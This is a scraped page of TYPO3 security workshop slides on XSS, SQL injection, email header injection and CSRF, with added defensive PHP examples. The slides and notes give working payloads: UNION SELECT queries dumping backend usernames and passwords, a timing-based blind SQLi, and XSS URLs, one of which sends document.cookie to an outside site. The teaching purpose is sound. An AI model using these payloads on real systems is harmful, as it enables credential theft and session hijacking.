Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 

T3DD10 Security Workshop

  • 1. TYPO3 Developer Days - Elmshorn 2010 Inspiring Security Workshop sha
  • 2. T3DD10 Security Security flaws versus Security concepts 02.07.2010 Helmut Hummel <helmut@typo3.org>
  • 3-10. Introduction. Do you ... know me? ... have a working development environment? ... ever heard of XSS? ... ever heard of SQLi? ... ever heard of CSRF? ... ever found a vulnerability in a TYPO3 extension? ... reported your findings to security@typo3.org?
  • 11. Did you ever hack for
  • 12. Security Flaws versus Security Concepts. Agenda: General Security Concepts; Hacking / Code Review Session; Getting into details about some vulnerability types; Writing down best practices for TYPO3 developers
  • 13-20. What is Security? Security is not a state. Security is a process: the security of an application must be proven over time; security must constantly be improved; an application can never be secure ... but only not insecure at a particular time; the „costs“ for security must relate to the possible impacts
  • 21-28. What is Security? General Security Concepts: Minimize Exposure / Least privilege; Don't trust user data, don't trust Services; Filter->Validate->Escape, never mix them up; Defense in depth; Positive Security Model (Whitelist); Use logging; Avoid security by obscurity
  • 29-35. Cross Site Scripting (XSS): Persistent / non-persistent XSS. Injecting Up: break out of the current DOM context. Injecting Down: stay in the current context, but use the possibilities, e.g. <img src="javascript:alert(document.cookie)" />
  • 36-39. Cross Site Scripting: Preventing XSS. Input validation and/or filtering is not enough. Escape correctly, depending on the context: <script>...NEVER PUT UNTRUSTED DATA HERE...</script> <img src="... OR HERE ..." /> ... because then you're doomed
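An added example (not code from the slides) of the "escape depending on the context" rule: one encoder per sink for the contexts the speaker notes list (HTML element, attribute value, JS variable value, URL parameter), plus a whitelist for URL-valued attributes such as <img src>, where escaping alone cannot help. Function names are my own; it assumes PHP 7 or later.

```php
<?php
// Added example for the "escape depending on the context" rule; not code
// from the workshop slides. One encoder per output context, plus a positive
// security model (whitelist) for <img src>, which no escaping can rescue.

/** Untrusted data placed between tags: entity-encode the HTML metacharacters. */
function escapeHtmlBody(string $data): string
{
    return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Untrusted data inside an attribute value. Same encoder, but the caller
 *  must also quote the attribute; in an unquoted attribute a space ends it. */
function escapeHtmlAttribute(string $data): string
{
    return htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Untrusted data assigned to a JavaScript variable: emit a JSON string
 *  literal with < > & ' " hex-escaped, so a "</script>" inside the value can
 *  never close the script block. This is the only JS placement that is safe:
 *  a quoted literal, never bare code. */
function escapeJsString(string $data): string
{
    $json = json_encode($data, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $json === false ? '""' : $json;   // invalid UTF-8 degrades to an empty literal
}

/** Untrusted data as one query-string value: percent-encode it and keep
 *  scheme, host and path fixed in the template. */
function escapeUrlParam(string $data): string
{
    return rawurlencode($data);
}

/** A URL attribute cannot be fixed by escaping: an entity-encoded
 *  "javascript:" URL is still a javascript: URL to the browser. Whitelist
 *  instead: accept http(s) URLs with a host, reject everything else. */
function safeImageSrc(string $url): ?string
{
    $parts = parse_url($url);
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return escapeHtmlAttribute($url);
}

/** One untrusted value rendered into each of the four contexts. */
function renderProfile(string $name): string
{
    return '<p>Hello, ' . escapeHtmlBody($name) . '</p>' . "\n"
        . '<input type="text" name="name" value="' . escapeHtmlAttribute($name) . '" />' . "\n"
        . '<script>var userName = ' . escapeJsString($name) . ';</script>' . "\n"
        . '<a href="/search?name=' . escapeUrlParam($name) . '">Search</a>' . "\n";
}

// Constructed input that would close the attribute and the script block
// if it were inserted raw (the "injecting up" case from the slides).
$untrusted = '" /></script><b>x</b>';
echo renderProfile($untrusted);
var_dump(safeImageSrc('javascript:alert(document.cookie)'));   // javascript: scheme, no host
var_dump(safeImageSrc('https://typo3.org/logo.png'));          // https with a host
```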
  • 40-41. Email Header Injection: PHP mail() function and From: header. Use filter_var($mail, FILTER_VALIDATE_EMAIL); do not allow chr(10) or chr(13)
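An added example (not code from the slides) of the two rules above applied to the headers passed to mail(): validate the sender with FILTER_VALIDATE_EMAIL and reject CR/LF before the value reaches a header line. It goes slightly beyond the slide by checking the Subject the same way, since it is a header too; function names are my own.

```php
<?php
// Added example, not code from the workshop slides: a header builder for
// mail() that validates the From: address with filter_var() and refuses
// chr(10)/chr(13) in any header-bound value. A real call would then be
// mail($to, $subject, $body, buildHeaders($from, $subject)).

final class MailHeaderException extends RuntimeException {}

/** Reject any value that could end the current header line and start another. */
function assertNoLineBreaks(string $value, string $field): void
{
    if (strpbrk($value, "\r\n") !== false) {
        throw new MailHeaderException("$field contains CR or LF");
    }
}

/** Validate the sender address. A syntactically valid address can never
 *  contain a line break, but the explicit check stays as defense in depth. */
function validateFromAddress(string $from): string
{
    assertNoLineBreaks($from, 'From');
    $valid = filter_var($from, FILTER_VALIDATE_EMAIL);
    if ($valid === false) {
        throw new MailHeaderException('From is not a valid email address');
    }
    return $valid;
}

/** Build the additional_headers string for mail(); nothing untrusted is
 *  placed into a header line before it has passed validation. */
function buildHeaders(string $from, string $subject): string
{
    $from = validateFromAddress($from);
    assertNoLineBreaks($subject, 'Subject');
    return "From: $from\r\n"
        . "Reply-To: $from\r\n"
        . 'X-Mailer: PHP/' . PHP_VERSION;
}

// Constructed inputs: a normal sender, and a value carrying an injected
// Bcc: header line of the kind the slide tells you to block.
$inputs = [
    'alice@example.org',
    "alice@example.org\r\nBcc: everyone@example.net",
];
foreach ($inputs as $candidate) {
    try {
        echo buildHeaders($candidate, 'Contact form'), "\n";
    } catch (MailHeaderException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```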
  • 42-43. SQL Injection (SQLi): (blind) SQL Injections, Timing attacks, UNION SELECT. Example: union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0 from be_users where admin in(1). Check your TypoScript!
  • 44-48. SQL Injection: Prevent SQLi. Prepared Statements / PDO; Escaping; Typecasting (intval), whitelist validation; Using an ORM (extbase, FLOW3, QCodo, ...)
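An added example (not the workshop's demo extension) of the showUid lookup that the SQLi demo on these slides targets: first the vulnerable string concatenation, then the slide's fixes, intval() typecasting, a PDO prepared statement, and whitelist validation for a part of the query (the sort column) that a placeholder cannot cover. Table and function names are constructed; it assumes PHP 7.1+ with pdo_sqlite so that it runs stand-alone.

```php
<?php
// Added example, not the workshop's demo extension code. In-memory SQLite
// stands in for the TYPO3 database so the script runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tx_demo_items (uid INTEGER PRIMARY KEY, title TEXT, hidden INTEGER)');
$pdo->exec("INSERT INTO tx_demo_items VALUES (1, 'Public item', 0), (2, 'Hidden item', 1)");

/** The 'before' form: the request value is pasted into the SQL string, so
 *  everything after the leading digit runs as SQL. With a UNION appended,
 *  rows the WHERE clause was meant to hide come back with the result. */
function findItemVulnerable(PDO $pdo, string $showUid): array
{
    $sql = "SELECT uid, title FROM tx_demo_items WHERE hidden = 0 AND uid = $showUid";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/** Fix 1, typecasting: intval() keeps the leading integer and drops the rest,
 *  which is sufficient for a value that can only ever be a record id. */
function findItemByIntval(PDO $pdo, string $showUid): array
{
    $uid = intval($showUid);
    $sql = "SELECT uid, title FROM tx_demo_items WHERE hidden = 0 AND uid = $uid";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/** Fix 2, validate then bind: the id is checked against a pattern and sent
 *  as a typed parameter, never as SQL text. Identifiers such as the ORDER BY
 *  column cannot be bound, so they are checked against a fixed list
 *  (positive security model) before being interpolated. */
function findItemPrepared(PDO $pdo, string $showUid, string $orderBy = 'uid'): array
{
    $allowedColumns = ['uid', 'title'];
    if (!in_array($orderBy, $allowedColumns, true)) {
        throw new InvalidArgumentException('Unknown sort column');
    }
    if (!preg_match('/^\d+$/', $showUid)) {
        throw new InvalidArgumentException('showUid must be a positive integer');
    }
    $stmt = $pdo->prepare(
        "SELECT uid, title FROM tx_demo_items WHERE hidden = 0 AND uid = :uid ORDER BY $orderBy"
    );
    $stmt->bindValue(':uid', (int)$showUid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed request value in the shape of the slide's demo: a valid id
// followed by a UNION that selects the rows marked hidden.
$tainted = '1 UNION SELECT uid, title FROM tx_demo_items WHERE hidden = 1';
print_r(findItemVulnerable($pdo, $tainted));
print_r(findItemByIntval($pdo, $tainted));
print_r(findItemPrepared($pdo, '1', 'title'));
foreach ([[$tainted, 'uid'], ['1', 'hidden']] as [$uid, $column]) {
    try {
        findItemPrepared($pdo, $uid, $column);
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```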
  • 49-50. Cross Site Request Forgery (CSRF): Executing arbitrary actions on behalf of a victim: <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0">. Stored CSRF (like XSS). Targeted Emails. Requires probably some kind of social engineering
  • 51. Cross Site Request Forgery: Prevent CSRF. Limiting to POST and checking the referrer is not enough. Double Submit Cookies; Challenge-Response; Synchronizer Token Pattern; No Cross-Site Scripting (XSS) Vulnerabilities
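An added example (not code from the slides or from TYPO3) of the Synchronizer Token Pattern named above: one random token per session, stored server side, embedded in every state-changing form and compared in constant time on submit. The class and field names are my own; the session store is passed in as an array reference so the script runs from the CLI without session_start(), and it assumes PHP 7 for random_bytes() and hash_equals().

```php
<?php
// Added example of the Synchronizer Token Pattern; not code from the slides.
// In an application you would pass $_SESSION to the constructor.
final class SynchronizerToken
{
    private const SESSION_KEY = 'csrf_token';
    private const FIELD_NAME  = 'csrf_token';

    /** @var array session storage, held by reference */
    private $session;

    public function __construct(array &$session)
    {
        $this->session = &$session;
    }

    /** The session's token, generated from the CSPRNG on first use. */
    public function getToken(): string
    {
        if (empty($this->session[self::SESSION_KEY])) {
            $this->session[self::SESSION_KEY] = bin2hex(random_bytes(32));
        }
        return $this->session[self::SESSION_KEY];
    }

    /** Hidden form field; the token is attribute-escaped like any other output. */
    public function hiddenField(): string
    {
        return '<input type="hidden" name="' . self::FIELD_NAME . '" value="'
            . htmlspecialchars($this->getToken(), ENT_QUOTES, 'UTF-8') . '" />';
    }

    /** Accept only a POST whose token equals the session token. Requiring
     *  POST alone is no defense (a form on another site can POST as well);
     *  the token is what a cross-site page cannot read and so cannot supply. */
    public function isValid(string $method, array $post): bool
    {
        if ($method !== 'POST' || empty($this->session[self::SESSION_KEY])) {
            return false;
        }
        $submitted = $post[self::FIELD_NAME] ?? null;
        return is_string($submitted)
            && hash_equals($this->session[self::SESSION_KEY], $submitted);
    }
}

// Constructed session and three requests: a genuine form submit, the
// tokenless cross-site request of the slide's <img> example, and a POST
// carrying a guessed token.
$session = [];
$csrf = new SynchronizerToken($session);
echo $csrf->hiddenField(), "\n";
var_dump($csrf->isValid('POST', ['csrf_token' => $csrf->getToken(), 'amount' => '100000']));
var_dump($csrf->isValid('GET', ['acct' => 'MARIA', 'amount' => '100000']));
var_dump($csrf->isValid('POST', ['csrf_token' => str_repeat('0', 64), 'amount' => '100000']));
```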
  • 53. Application Vulnerabilities, more: Information Disclosure; HTTP Response Splitting; Path Traversal; Privilege Escalation; Session Fixation; LDAP Injection; Remote Code Execution
  • 54. T3DD10 Security Workshop Resources: PHP-Sicherheit (Christopher Kunz and Stefan Esser); Essential PHP Security (Chris Shiflett); http://www.owasp.org/; http://www.ibm.com/developerworks/opensource/library/os-php-secure-apps/index.html; http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
  • 55. T3DD10 Security Workshop SQLi Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi1/? no_cache=1&tx_coolextension_pi1[showUid]=1%2 0UNION%20SELECT%20uid,%20pid,%20tstamp, %20crdate,%20cruser_id,uid%20as %20t3ver_oid,uid%20as%20t3ver_id,uid%20as %20t3ver_wsid,uid%20as%20t3ver_label,uid%20as %20t3ver_state,%20uid%20as%20t3ver_stage,uid %20as%20t3ver_count,uid%20as %20t3ver_tstamp,uid%20as%20t3_origuid,uid %20as%20sys_language_uid,uid%20as %20l10n_parent,uid%20as %20l10n_diffsource,deleted,disable%20as %20hidden,starttime,endtime,%20usergroup%20as %20fe_group,username%20as
  • 56. T3DD10 Security Workshop XSS Exploit http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3Cscript %3Ewindow.location.href+%3D+%27http%3A%2F %2Ftypo3.org%2F%3Fcookie%3D%27+%2B +document.cookie%3B%3C%2Fscript%3E
  • 57. T3DD10 Security Workshop XSS Exploit bit.ly/bpJzpF http://192.168.100.139/introductionpackage/ t3dd10/pi2/? no_cache=1&tx_coolextension_pi2[name]= %22+type%3D%22hidden%22%2F%3E%3C%2Fform %3E%3Cform+action%3D%22http%3A%2F %2Ftypo3.org%22%3E%3Cinput+type%3D%22text %22+name%3D%22name

Speaker notes

  1. Who already heard of XSS, CSRF
  2-9. since 2005, security since 2008, leader since end 2009
  10. Application Security, not personal nor governmental
  11-15. invest in resources taken for security / potential loss when hacked => If a hacker has to invest much more than he gets back, he or she won't attack => Your system is secure. An application must constantly be improved => As hackers and hacker tools evolve, so the security concepts have to
  16-22. give the least information possible (wizard.dat), hide files from the webroot, DB users, Apache user. User data: GET, POST, COOKIE, DB? Escaping is all about context. Defense in depth: as many defense lines as reasonable (health record example: TYPO3, no private data stored in the DB or on disk, not even images; authentication through a 64bit hash calculated from the password; all data from an external DB where everything is encrypted, decrypted with that hash). Obscurity: e.g. alternate telnet port; hide source
  23-29. Injecting Up: "> </script> Injecting Down: <img src="...UNTRUSTED DATA HERE..." /> <img src="javascript:alert(document.cookie)" /> „You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into.“
  30-32. Input Validation: „a>b“ or „Me & you“, twitter attack. Escaping is not easy because of the different contexts of HTML: http://isisblogs.poly.edu/2008/08/16/php-strip_tags-not-a-complete-protection-against-xss/ <script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script; <!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment; <div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name; <...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name. Contexts: HTML element, HTML attribute value, JS variable value, URL parameter
  33. SELECT title, description, body FROM items WHERE ID = 2 and 1=2 / SELECT title, description, body FROM items WHERE ID = 2 and 1=1 / 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1; Defense in depth (saltedpw) http://localhost:8888/introductionpackage/t3dd10/pi1/?L=1%29%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,username,password,0%20from%20be_users%20where%20admin%20in%281
  34-37. Escaping: * use the TYPO3 API for that * fullQuoteStr(): '' are necessary
  38. POST can be forged, the referrer can be spoofed. Double Submit Cookies: * sending the session id as cookie and as form value. Downsides: session hijacking, httponly for cookies not valid any more. Challenge-Response: * CAPTCHA * Re-Authentication (password), confirmation? alert() via javascript, clickable? * One-time Token. Synchronizer Token Pattern: * Generate one or more random tokens for a session (per session or per request) * randomize the token variable name (per request downside: browser back button) http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
  39-45. Privilege Escalation, Session Fixation, Information Disclosure, Path Traversal (Files), Remote Code Execution